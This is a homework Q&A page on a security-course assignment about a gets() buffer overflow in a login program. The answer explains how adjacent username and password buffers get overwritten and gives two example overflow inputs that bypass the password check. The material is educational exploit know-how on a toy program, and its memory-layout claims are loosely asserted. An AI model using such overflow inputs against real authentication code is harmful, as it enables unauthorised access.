contestada

Identify a buffer overflow vulnerability in the source of the login program attached to this assignment (assignment.c). Show two possible inputs that can be used to bypass password authentication, i.e., that can allow the adversary to login without knowing the victim’s password. Explain, using up to 300 words, how your attack works. Be specific, and assume that the reader is familiar with the concept of buffer overflows. You can modify the code in order to better understand how it works. However, the buffer overflow described in your report must apply to the original code.

Respuesta :

abdullahfarooqi

Answer:

gets() is a inbuild function which do not check length the of input string, so when user's input data length is higher than the specified variable length (12 in the given example) the buffer overflow occurs.

In the given code the username and password variable are defined just after the candidateusername and candidatepassword so the memory allocated for them will be one after the other.

In order to bypass password authentication the user need to overflow the input buffer as explained with 2 examples below

example 1

enter username: abcd12345678

enter password for user abcd12345678: xyz987654321abcd12345678xyz987654321

this will assign variable candidateusername with "abcd12345678" , variable candidatepassword with " xyz987654321" and reassign variable username to "abcd12345678" and variable password to " xyz987654321" hence if condition will be true and access will be granted to the user .

example 2 (considering username is known)

enter username: alice

enter password for user alice: abcd00000000alice0000000abcd

this will assign variable candidateusername with "alice" , variable candidatepassword with " abcd" and overwrite password variable to "abcd" hence if condition will be true and access will be granted to the user .

Explanation:

Otras preguntas